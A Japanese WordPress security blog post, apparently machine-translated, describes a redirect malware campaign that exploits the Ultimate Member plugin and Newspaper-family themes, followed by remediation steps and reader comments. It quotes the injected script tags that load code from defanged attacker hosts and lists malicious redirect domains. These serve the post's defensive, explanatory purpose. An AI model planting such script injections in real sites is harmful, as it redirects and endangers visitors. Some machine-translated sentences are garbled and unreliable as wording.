Ultimate Memberプラグインと Newspaper テーマの脆弱性を悪用したリダイレクトマルウェア

10

最近になってutroro [。] comにリダイレクトされるマルウェアに感染した WordPressが大幅に増えました。 このマルウェアに感染すると、ユーザーは、次のようなサイトにリダイレクトされます。

WordPress マルウェア

リダイレクトされると、ランダムなutroro [。] comアドレスと偽reCAPTCHA画像にされたページが表示されます。

utroroアドレスのほか、次のようなアドレスでもリダイレクトすることができます。

hxxp://murieh[.]space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub

hxxps://unverf[.]com/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub

セキュリティ企業Sucuriブログ記事によると、このマルウェアに感染したサイトには、次の2つのサイトのいずれかされたスクリプトのいずれかが挿入されます。

  • cdn.eeduelements [。] com
  • cdn.allyouwant [。] online。

最初は、上記のアドレスが挿入されたが、約1週間後に2番目のアドレスが出現しました。 しかし、ハッカーがグィチァニズムからか、それともコーディング技術が不足したためかわからなくても、新しいマルウェアのバージョンに再感染しているサイトでは、まず、注入されたコードが削除されなくて、同じサイトには、次の2つのスクリプトがすべて挿入されることがあります。

...
<script type='text/javascript' src='hxxps://cdn.eeduelements[.]com/jquery.js?ver=1.0.8'></script><script type='text/javascript' src='hxxps://cdn.allyouwant[.]online/main.js?t=lp1'></script></head>
...

Sucuri文が作成された時点(約3日前)にcdn.eeduelements [。] comスクリプトが含まれているサイトが1700以上でcdn.allyouwant [。] onlineスクリプトが含まれているサイトが500以上でした。

今チェックしてみると、それぞれ 2300以上1700以上のサイトに、これらのスクリプトが含まれていますね。 感染したサイトが増えましたね。

詳細な技術的な内容は、 Sucuriのブログ記事で確認することができます。

保護措置

三、四つの感染ベクトル(infection vector)といくつかのマルウェアの亜種を介して攻撃が行われています。 次のような措置をとることができます。

  • すべてのテーマとプラグインを最新バージョンに更新します。 特にUltimate Member(2.0.23以前のバージョン)のプラグインやtagDivのテーマ(Newspaper, Newsmag など)を使用する場合には必ず最新のバージョンに更新してください。
  • tagDiv攻撃(ハッカーがコンピュータやネットワークにアクセスするために使用するパスまたは方法)の場合 Theme panel> ADS> YOUR HEADER ADを通じたテーマの管理インターフェイスと「カスタムHTML」ウィジェットでも発見されることがあります。
  • Ultimate Memberを介して感染した場合には、wp-content / uploads / ultimatemember / temp /の下のサブディレクトリにあるすべてのPHPファイルを削除して、「header」と「jquery」ファイルで上記のスクリプトを削除します。
  • 同じサーバーのアカウントを共有するすべてのサイトでもマルウェアを削除して、セキュリティ対策をとってべきです。 それ以外の場合、サイトがすぐに簡単に再感染することができます。

おわりに

今回の大規模感染はゼロデイ攻撃(ゼロデイ脅威、Zero-Day Attack)がどのように発生して、セキュリティの脆弱性の脅威期間(Vulnerability Window)の間にどのように爆発的に増加するかを明確に示しています。

脆弱性が公開されると、機会をトゥムタン攻撃がすぐに増加する事例がしばしばあります。 ハッカーは、人気のあるテーマやプラグインの変更を綿密に注視します。 セキュリティ上の問題が修正されることを悪意のあるハッカーが気づかされると、最新のバージョンにパッチしていない脆弱なサイトを対象に、旧バージョンの脆弱性を悪用しようとすることができます。

サイトのすべての要素をタイムリーに更新して、感染のリスクを最小限に抑えることが非常に重要です。 テーマやCMSは、プラグインを更新することができない場合は、ほとんどの新規攻撃をブロックすることができるウェブサイトのファイアウォールを使用することを考慮してみることができます。

WordPressと関連して困難を経験する場合(サイトへのアクセス不能、マルウェア感染など) ここでサービス(有料)をご依頼することができます。

10のコメント

  1. Ultimate Member 2.0以上でheaderを変更ね。
    上記の提示したサイトだけでなく、大規模なアドレスにリダイレクトされて
    ある瞬間、管理者まで生成します。 〜〜

    二ヶ月ほど前、ブラウザのキャッシュのためにした1〜2週間マルウェアかかったか分かっていないが
    管理者の作成いいん見以上であるたい確認してみる
    新しいシークレットウィンドウで複数のアドレスにリダイレクトさせたんですよ。

    head領域でスクリプト消去修正しました。

    Ultimate Memberを含めて、セキュリティに脆弱ないくつかのプラグインを削除したが
    このポスト読んでみると、最終的にUltimate Memberからだったのかですね。
    使わもないのにやたらオン置い〜。 〜

    • こんにちは?

      ブログを訪問していただきありがとうございます。

      マルウェアが継続変種を起こしてunverf [。] com、tuniaf [。] comなど、さまざまなサイトにリダイレクトされることがあります。

      楽しい秋夕連休になってください????

  2. いくつかのサイトに入ったらブラウザのアドレスバーが休む暇もなく変わり、どこかにリダイレクトされるようですね。 驚いウィンドウを閉じてしまいました。 そのサイトもその後マルウェアに感染していたのはガブワヨ。

    • マルウェアに感染したサイトである可能性が高いようです。

      たとえば、マルウェアに感染すると、1.tuniaf [。] com、2.tuniaf [。] com、3.tuniaf [。] com .... 11.tuniaf [。] comなど継続アドレスが変わりリダイレクトされるがあります。

      • Webminiサイトでは常に最新のバージョンにアップデートをするため別の問題がないようです。

  3. 過去23日、sitegroundの第ウェブサイトにアクセスをしたら、最初にプリ的に更新がないだろう。 その後 https://www.miningbarn.com にリダイレクトがますね。 ところが、あいにく、この問題がsitegroundのSSLの更新の問題が発見された直後に起きsupportに連絡して解決しました。 ところが、support担当者がサイトをスキャンしてみたマルウェア感染はなかったですね。 次に、sitegroundで感染が起こったのか...とにかく今星の経験を尽くします。 参照してください〜。 笑

    問題のサイトはnewspaperテーマ(tagDiv)を使用します。

    あなたの忍耐をありがとうございました。

    I have turned your case to the attention of our system administrators and they have reapplied the SSL certificate for the domain。

    The application at https://mhjn.kr/ is working as intended。

    Please clear your browser's cache and verify on your end。

    We have also scanned your account for malicious files and no threats were found:

    コード:
    Scanning [/ home / mhjn6068 / public_html] ... Please wait ...
    -----------------------------------------
    Scanned Files:141918
    Scanner Hits:0

    If you have further questions do not hesitate to contact us。

    • こんにちは?

      マルウェアは、アップデートをきちんとしていないか、または弱いパスワード、間違っセキュリティ慣行に多く発生します。

      特に WordPress、テーマ、プラグインを最新の状態に保つことが重要です。

      SSLセキュリティ証明書の更新の問題のためにマルウェアが発生することはないようです。

      mhjin [。] krは、現在工事中のページが表示さね。 このような場合には、外部からのサイトにアクセスすることができないので、マルウェアに感染する可能性は非常に低いものです。

  4. ハック。私が使用しているテーマにリダイレクトマルウェア。ㅜㅜ
    私のテーマは、アップデートがされると、その場ですぐする方なのに、再確認をして見なければならなり。
    良い情報ありがとうございます。!

コメントを残す

コメントを入力してください!
名前を入力してください